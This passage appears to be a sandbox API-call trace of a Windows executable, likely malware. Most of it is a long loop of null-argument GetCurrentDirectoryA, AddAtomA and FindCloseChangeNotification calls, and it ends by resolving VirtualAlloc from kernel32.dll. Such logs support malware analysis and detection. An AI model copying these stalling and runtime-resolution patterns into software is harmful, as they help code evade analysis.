lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.298] AddAtomA (lpString=0x0) returned 0x0 [0129.298] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.298] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.298] AddAtomA (lpString=0x0) returned 0x0 [0129.298] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.299] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.299] AddAtomA (lpString=0x0) returned 0x0 [0129.299] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.299] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.299] AddAtomA (lpString=0x0) returned 0x0 [0129.299] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.299] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.299] AddAtomA (lpString=0x0) returned 0x0 [0129.299] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.299] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.299] AddAtomA (lpString=0x0) returned 0x0 [0129.299] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.299] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.299] AddAtomA (lpString=0x0) returned 0x0 [0129.299] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.299] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.299] AddAtomA (lpString=0x0) returned 0x0 [0129.299] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.299] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.299] AddAtomA (lpString=0x0) returned 0x0 [0129.299] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.299] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.299] AddAtomA (lpString=0x0) returned 0x0 [0129.299] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.299] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.299] AddAtomA (lpString=0x0) returned 0x0 [0129.300] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.300] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.300] AddAtomA (lpString=0x0) returned 0x0 [0129.300] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.300] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.300] AddAtomA (lpString=0x0) returned 0x0 [0129.300] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.300] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.300] AddAtomA (lpString=0x0) returned 0x0 [0129.300] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.300] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.300] AddAtomA (lpString=0x0) returned 0x0 [0129.300] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.300] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.300] AddAtomA (lpString=0x0) returned 0x0 [0129.300] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.300] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.300] AddAtomA (lpString=0x0) returned 0x0 [0129.300] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.300] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.300] AddAtomA (lpString=0x0) returned 0x0 [0129.300] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.300] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.300] AddAtomA (lpString=0x0) returned 0x0 [0129.300] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.300] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.300] AddAtomA (lpString=0x0) returned 0x0 [0129.300] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.300] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.301] AddAtomA (lpString=0x0) returned 0x0 [0129.301] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.301] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.301] AddAtomA (lpString=0x0) returned 0x0 [0129.301] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.301] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.301] AddAtomA (lpString=0x0) returned 0x0 [0129.301] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.301] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.301] AddAtomA (lpString=0x0) returned 0x0 [0129.301] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.301] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.301] AddAtomA (lpString=0x0) returned 0x0 [0129.301] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.301] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.301] AddAtomA (lpString=0x0) returned 0x0 [0129.301] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.301] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.301] AddAtomA (lpString=0x0) returned 0x0 [0129.301] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.301] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.301] AddAtomA (lpString=0x0) returned 0x0 [0129.301] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.301] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.302] AddAtomA (lpString=0x0) returned 0x0 [0129.302] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.302] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.302] AddAtomA (lpString=0x0) returned 0x0 [0129.302] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.302] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.302] AddAtomA (lpString=0x0) returned 0x0 [0129.302] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.302] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.302] AddAtomA (lpString=0x0) returned 0x0 [0129.302] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.302] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.302] AddAtomA (lpString=0x0) returned 0x0 [0129.302] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.302] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.302] AddAtomA (lpString=0x0) returned 0x0 [0129.302] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.302] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.302] AddAtomA (lpString=0x0) returned 0x0 [0129.302] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.302] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.302] AddAtomA (lpString=0x0) returned 0x0 [0129.302] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.302] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.302] AddAtomA (lpString=0x0) returned 0x0 [0129.303] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.303] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.303] AddAtomA (lpString=0x0) returned 0x0 [0129.303] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.303] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.303] AddAtomA (lpString=0x0) returned 0x0 [0129.303] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.303] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.303] AddAtomA (lpString=0x0) returned 0x0 [0129.303] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.303] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.303] AddAtomA (lpString=0x0) returned 0x0 [0129.303] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.303] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.303] AddAtomA (lpString=0x0) returned 0x0 [0129.303] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.303] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.303] AddAtomA (lpString=0x0) returned 0x0 [0129.303] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.303] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.303] AddAtomA (lpString=0x0) returned 0x0 [0129.303] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.303] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.303] AddAtomA (lpString=0x0) returned 0x0 [0129.304] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.304] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.304] AddAtomA (lpString=0x0) returned 0x0 [0129.304] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.304] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.304] AddAtomA (lpString=0x0) returned 0x0 [0129.304] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.304] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.304] AddAtomA (lpString=0x0) returned 0x0 [0129.304] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.304] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.304] AddAtomA (lpString=0x0) returned 0x0 [0129.304] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.304] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.304] AddAtomA (lpString=0x0) returned 0x0 [0129.304] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.304] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.304] AddAtomA (lpString=0x0) returned 0x0 [0129.304] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.304] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.304] AddAtomA (lpString=0x0) returned 0x0 [0129.304] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.304] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.304] AddAtomA (lpString=0x0) returned 0x0 [0129.305] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.305] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.305] AddAtomA (lpString=0x0) returned 0x0 [0129.305] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.305] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.305] AddAtomA (lpString=0x0) returned 0x0 [0129.305] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.305] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.305] AddAtomA (lpString=0x0) returned 0x0 [0129.305] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.305] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.305] AddAtomA (lpString=0x0) returned 0x0 [0129.305] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.305] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.305] AddAtomA (lpString=0x0) returned 0x0 [0129.305] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.305] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.305] AddAtomA (lpString=0x0) returned 0x0 [0129.305] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.305] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.305] AddAtomA (lpString=0x0) returned 0x0 [0129.305] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.305] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.305] AddAtomA (lpString=0x0) returned 0x0 [0129.305] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.305] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.305] AddAtomA (lpString=0x0) returned 0x0 [0129.305] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.305] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.306] AddAtomA (lpString=0x0) returned 0x0 [0129.306] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.306] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.306] AddAtomA (lpString=0x0) returned 0x0 [0129.306] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.306] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.306] AddAtomA (lpString=0x0) returned 0x0 [0129.306] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.306] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.306] AddAtomA (lpString=0x0) returned 0x0 [0129.306] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.306] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.306] AddAtomA (lpString=0x0) returned 0x0 [0129.306] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.306] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.306] AddAtomA (lpString=0x0) returned 0x0 [0129.306] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.306] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.306] AddAtomA (lpString=0x0) returned 0x0 [0129.306] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.306] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.306] AddAtomA (lpString=0x0) returned 0x0 [0129.306] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.306] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.306] AddAtomA (lpString=0x0) returned 0x0 [0129.306] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.306] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.306] AddAtomA (lpString=0x0) returned 0x0 [0129.306] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.306] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.306] AddAtomA (lpString=0x0) returned 0x0 [0129.307] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.307] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.307] AddAtomA (lpString=0x0) returned 0x0 [0129.307] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.307] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.307] AddAtomA (lpString=0x0) returned 0x0 [0129.307] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.307] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.307] AddAtomA (lpString=0x0) returned 0x0 [0129.307] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.307] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.307] AddAtomA (lpString=0x0) returned 0x0 [0129.307] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.307] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.307] AddAtomA (lpString=0x0) returned 0x0 [0129.307] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.307] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.307] AddAtomA (lpString=0x0) returned 0x0 [0129.307] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.307] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.307] AddAtomA (lpString=0x0) returned 0x0 [0129.307] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.307] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.307] AddAtomA (lpString=0x0) returned 0x0 [0129.307] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.307] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.307] AddAtomA (lpString=0x0) returned 0x0 [0129.307] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.307] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.307] AddAtomA (lpString=0x0) returned 0x0 [0129.307] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.308] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.308] AddAtomA (lpString=0x0) returned 0x0 [0129.308] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.308] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.308] AddAtomA (lpString=0x0) returned 0x0 [0129.308] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.308] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.308] AddAtomA (lpString=0x0) returned 0x0 [0129.308] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.308] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.308] AddAtomA (lpString=0x0) returned 0x0 [0129.308] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.308] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.308] AddAtomA (lpString=0x0) returned 0x0 [0129.308] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.308] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.308] AddAtomA (lpString=0x0) returned 0x0 [0129.308] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.308] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.308] AddAtomA (lpString=0x0) returned 0x0 [0129.308] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.308] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.308] AddAtomA (lpString=0x0) returned 0x0 [0129.308] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.308] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.308] AddAtomA (lpString=0x0) returned 0x0 [0129.308] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.308] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.308] AddAtomA (lpString=0x0) returned 0x0 [0129.309] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.309] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.309] AddAtomA (lpString=0x0) returned 0x0 [0129.309] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.309] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.309] AddAtomA (lpString=0x0) returned 0x0 [0129.309] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.309] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.309] AddAtomA (lpString=0x0) returned 0x0 [0129.309] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.309] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.309] AddAtomA (lpString=0x0) returned 0x0 [0129.309] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.309] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.309] AddAtomA (lpString=0x0) returned 0x0 [0129.309] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.309] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.309] AddAtomA (lpString=0x0) returned 0x0 [0129.309] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.309] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.309] AddAtomA (lpString=0x0) returned 0x0 [0129.309] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.309] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.309] AddAtomA (lpString=0x0) returned 0x0 [0129.309] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.310] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.310] AddAtomA (lpString=0x0) returned 0x0 [0129.310] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.310] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.310] AddAtomA (lpString=0x0) returned 0x0 [0129.310] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.310] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.310] AddAtomA (lpString=0x0) returned 0x0 [0129.310] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.310] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.310] AddAtomA (lpString=0x0) returned 0x0 [0129.310] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.310] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.310] AddAtomA (lpString=0x0) returned 0x0 [0129.310] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.310] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.310] AddAtomA (lpString=0x0) returned 0x0 [0129.310] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.310] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.310] AddAtomA (lpString=0x0) returned 0x0 [0129.310] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.310] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.310] AddAtomA (lpString=0x0) returned 0x0 [0129.310] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.311] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.311] AddAtomA (lpString=0x0) returned 0x0 [0129.311] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.311] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.311] AddAtomA (lpString=0x0) returned 0x0 [0129.311] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.311] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.389] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76d30000 [0129.389] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualAlloc") returned 